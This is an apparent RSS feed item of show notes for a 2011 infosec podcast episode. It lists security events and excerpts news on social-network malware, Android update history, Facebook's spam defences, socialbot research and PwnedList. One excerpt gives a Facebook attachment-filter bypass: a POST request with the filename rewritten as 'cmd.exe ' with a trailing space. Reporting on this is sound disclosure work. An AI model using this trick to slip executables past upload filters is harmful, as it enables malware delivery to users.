	</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.defcon.org/html/links/dc-archives/dc-19-archive.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.defcon.org/html/links/dc-archives/dc-19-archive.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The videos for DEF CON 19 have been posted. &nbsp;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.darkreading.com/insider-threat/167801100/security/client-security/231901810/social-malice-one-in-100-tweets-and-one-in-60-facebook-posts-are-malicious.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/insider-threat/167801100/security/client-security/231901810/social-malice-one-in-100-tweets-and-one-in-60-facebook-posts-are-malicious.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here&#39;s what social networking looks like on the dark side: one in 100 tweets today are malicious, and one in 60 Facebook posts are as well.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook users are the least confident in social network security, with 40 percent confessing they feel unsafe on Facebook, while 28 percent feel that way about Twitter, and 14 percent on LinkedIn. But that doesn&#39;t mean LinkedIn won&#39;t eventually become a big target for cybercrime: &quot;When you look at the actual damage that could be done to a business&quot; by hackers targeting LinkedIn accounts, it&#39;s high for business disruption and employee misinformation, for example, says Daniel Peck, senior research scientist with Barracuda Labs, who today at HackerHalted in Miami shared Barracuda&#39;s latest data on malicious activity on Twitter, Facebook, and on search engines.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to new Barracuda survey data of social media users, LinkedIn is the least-blocked social network by enterprises, with only 20 percent of organizations preventing their employees from using LinkedIn from work. That in contrast to Twitter (25 percent); Google+ (24 percent); and Facebook (31 percent).</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Peck predicts that LinkedIn definitely will be a target for badness. &quot;I think there will be a lot of social attacks there,&quot; he says.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Interestingly, most users say the important factors to consider when joining a social network are security (92 percent), that their friends use it (91 percent), privacy (90 percent), and ease of use (87 percent). More than 90 percent have received spam over a social network, and more than half have experienced phishing attacks. More than 20 percent have received malware, 16.6 have had their account used for spamming, and about 13 percent have had their account hijacked or their password stolen. More than half are unhappy with Facebook&#39;s privacy controls.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meanwhile, Barracuda counted 43 percent of Twitter accounts as &quot;true users&quot; with real followers and regular tweets, and 57 percent as &quot;not true users&quot; &#8212; either spam bots or inactive accounts.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attackers abuse Twitter in much the same way that they engage in search-engine poisoning, according to Peck, casting a wide net and hoping to get more eyeballs. &quot;Facebook manipulates trust more &ndash; your Friends are people you make eye contact with,&quot; he says.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Facebook is less likely to get hit by a driveby download or to exploit your browser. Twitter is more likely&quot; to get hit that way, he says. &quot;A Facebook [attack] is more likely going after your data, or pushing an affiliate scam sort of thing.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The good news about Facebook abuse, Peck says, is that it&#39;s become high-profile enough that word gets out faster when a scam hits. A prime example was this week, when a &quot;Starbucks&#39; anniversary&quot; scam began to spread. &quot;So Starbucks Corporate put out on Twitter that it was a Facebook scam and was not real,&quot; Peck says. &quot;This is getting big enough that the big companies are starting to notice the scams.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Barracuda also measures search malware on Google, Bing, Twitter, and Yahoo over a 153-day period and found 34,627 malware samples, with one in 1,000 search results leading to malware. And one in five search topics lead to malware, with &quot;music + video&quot; containing the most malicious links. The number two search term leading to malware: &#39;s &quot;JenniJ-Woww,&quot; with 17 percent of the malicious search results. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.securitypentest.com/2011/10/facebook-attach-exe-vulnerability.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitypentest.com/2011/10/facebook-attach-exe-vulnerability.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When using the Facebook &#39;Messages&#39; tab, there is a feature to attach a file. Using this feature normally, the site won&#39;t allow a user to attach an executable file. A bug was discovered to subvert this security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When attaching an executable file, Facebook will return an error message stating:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Error Uploading: You cannot attach files of that type.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When uploading a file attachment to Facebook we captured the web browsers POST request being sent to the web server. Inside this POST request reads the line:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Content-Disposition: form-data; name=&quot;attachment&quot;; filename=&quot;cmd.exe&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It was discovered the variable &#39;filename&#39; was being parsed to determine if the file type is allowed or not.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To subvert the security mechanisms to allow an .exe file type, we modified the POST request by appending a space to our filename variable like so:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">filename=&quot;cmd.exe &quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://theunderstatement.com/post/11982112928/android-orphans-visualizing-a-sad-history-of-support"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://theunderstatement.com/post/11982112928/android-orphans-visualizing-a-sad-history-of-support</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The announcement that Nexus One users won&rsquo;t be getting upgraded to Android 4.0 Ice Cream Sandwich led some to justifiably question Google&rsquo;s support of their devices. I look at it a little differently: Nexus One owners are lucky. I&rsquo;ve been researching the history of OS updates on Android phones and Nexus One users have fared much, much better than most Android buyers.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I went back and found every Android phone shipped in the United States</span><a href="http://theunderstatement.com/post/11982112928/android-orphans-visualizing-a-sad-history-of-support#fn:1"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">1</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> up through the middle of last year. I then tracked down every update that was released for each device &#8211; be it a major OS upgrade or a minor support patch &#8211; as well as prices and release &amp; discontinuation dates. I compared these dates &amp; versions to the currently shipping version of Android at the time. The resulting picture isn&rsquo;t pretty &#8211; well, not for Android users:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.newscientist.com/article/dn21095-inside-facebooks-massive-cybersecurity-system.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.newscientist.com/article/dn21095-inside-facebooks-massive-cybersecurity-system.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FACEBOOK has released details of the extraordinary security infrastructure it uses to fight off spam and other cyber-scams.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Known as the Facebook Immune System (FIS), the massive defence network appears to be successful: numbers released by the company this week show that less than 1 per cent of users experience spam. Yet it&#39;s not perfect. Researchers have built a novel attack that evaded the cyber-defences and extracted private material from real users&#39; Facebook accounts.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It took just three years for FIS to evolve from basic beginnings into an all-seeing set of algorithms that monitors every photo posted to the network, every status update&ndash; indeed, every click made by every one of the 800 million users. There are more than 25 billion of these &quot;read and write actions&quot; every day. At peak activity the system checks 650,000 actions a second.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It&#39;s a big challenge,&quot; says Jim Larus, a Microsoft researcher in Redmond, Washington, who studies large networks. The only network bigger, Larus suspects, is the web itself. That makes Facebook&#39;s defence system one of the largest in existence.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It protects against scams by harnessing artificially intelligent software to detect suspicious patterns of behaviour. The system is overseen by a team of 30 people, but it can learn in real time and is able to take action without checking with a human supervisor.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One notable attack took place in April, says</span><a href="http://research.microsoft.com/en-us/projects/ldg/a10-stein.pdf"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Tao Stein</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a Facebook engineer who works on the system. It began when several users were duped into copying computer code into their browser&#39;s address bar. The code commandeered the person&#39;s Facebook account, and started sending chat messages to their friends saying things like &quot;I just got a free iPad&quot;, along with a link where the friends could go to get their own. Friends who clicked on the link went to a site that encouraged them to paste the same code into their browsers, further spreading the plague. &quot;Attacks like these can generate millions of messages per minute,&quot; says Stein.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Users are less likely to fall for a similar tactic when using email, because the message would probably be sent by a stranger.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But inside Facebook&#39;s network it&#39;s much more persuasive. &quot;It&#39;s easier to exploit trust relationships in online social networks,&quot; says Justin Ma, a computer scientist at the University of California, Berkeley, who develops methods to combat email spam.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To tackle the attack, FIS generated a signature that it used to differentiate between spam and legitimate messages. This was based on the links in the spam messages, keywords like &quot;free&quot; and &quot;iPad&quot;, and the IP addresses of the computers sending the messages.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But spammers can use multiple machines to switch IP addresses, and link redirection services like</span><a href="https://bitly.com/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">bit.ly</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> can change links on the fly. So FIS checked to see which messages were being flagged as spam by users and blocked messages with similar keywords in the text. Together with other features of the message, which Facebook declined to discuss for fear of aiding spammers, the system was able to begin developing a signature to identify the spam within seconds of the attack emerging.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook said this week that, thanks to FIS, less than 4 per cent of the network&#39;s messages are spam and that fewer than 1 in 200 users experience spam on any given day. &quot;It&#39;s pretty good,&quot; says Ma, who has a Facebook account. &quot;I&#39;m pretty happy with the level of security.&quot;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Yet like any defence based on patterns of known behaviour, FIS is vulnerable to strategies it has not seen before. Yazan Boshmaf and colleagues at the University of British Columbia in Vancouver, Canada, have exploited this</span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">and eluded the system by creating &quot;socialbots&quot;&ndash; software that can pose as a human and control a Facebook account.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The bots began by sending friend requests to random users, around 1 in 5 of whom accepted. They then sent requests to the friends of the people they had connected with, and the acceptance rate jumped to almost 60 per cent. After seven weeks the team&#39;s 102 bots had made a combined 3000 friends.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook&#39;s privacy settings allow users to shield personal information from public view. But because the socialbots posed as friends, they were able to extract some 46,500 email addresses and 14,500 physical addresses from users&#39; profiles&ndash; information that could be used to launch phishing attacks or aid in identity theft.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;An attacker could do many things with this data,&quot; says Boshmaf, who will present the team&#39;s work at the Annual Computer Security Applications Conference in Orlando, Florida, next month.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A socialbot attack is yet to happen, but it&#39;s only a matter of time. Socialbots behave differently to humans that enter Facebook for the first time, in part because they have no real-world friends to connect with, and their random requests lead to an unusually high number of rejections. FIS would be able to use this pattern to recognise and block an attack of socialbots, says Stein. That would put Facebook back on top&ndash; if only until hackers release their next innovation.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://threatpost.com/en_us/blogs/got-pwned-pwnedlistcom-knows-102711"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/got-pwned-pwnedlistcom-knows-102711</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With more and more victims of identity theft minted every day, figuring out if you&#39;re one of the unlucky masses with a leaked email password is yeoman&#39;s work. Now one security researcher is trying to make it easy with</span><a href="http://www.pwnedlist.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> PwnedList.com</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a Web site that collects leaked and stolen data, then tells Internet users whether their information is in it.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">PwnedList is the brainchild of Alen Puzic, a security researcher who works for HP&#39;s TippingPoint DVLabs on the</span><a href="http://dvlabs.tippingpoint.com/team"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Advanced Security Intelligence team</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. The biggest challenge, he says, is staying on top of the tsunami of leaked records &#8211; which are pouring in at a rate of 40,000 to 50,000 a week. Puzic chatted(*) with Threatpost editor Paul Roberts via Skype this week.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-506-dc19-videos-odds-160-1100-facebook-attachments-little-orphan-android-fis-got-pwn%e2%80%99d/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3039/0/infosec-daily-podcast-episode-506.mp3" length="19064308" type="audio/mpeg" />
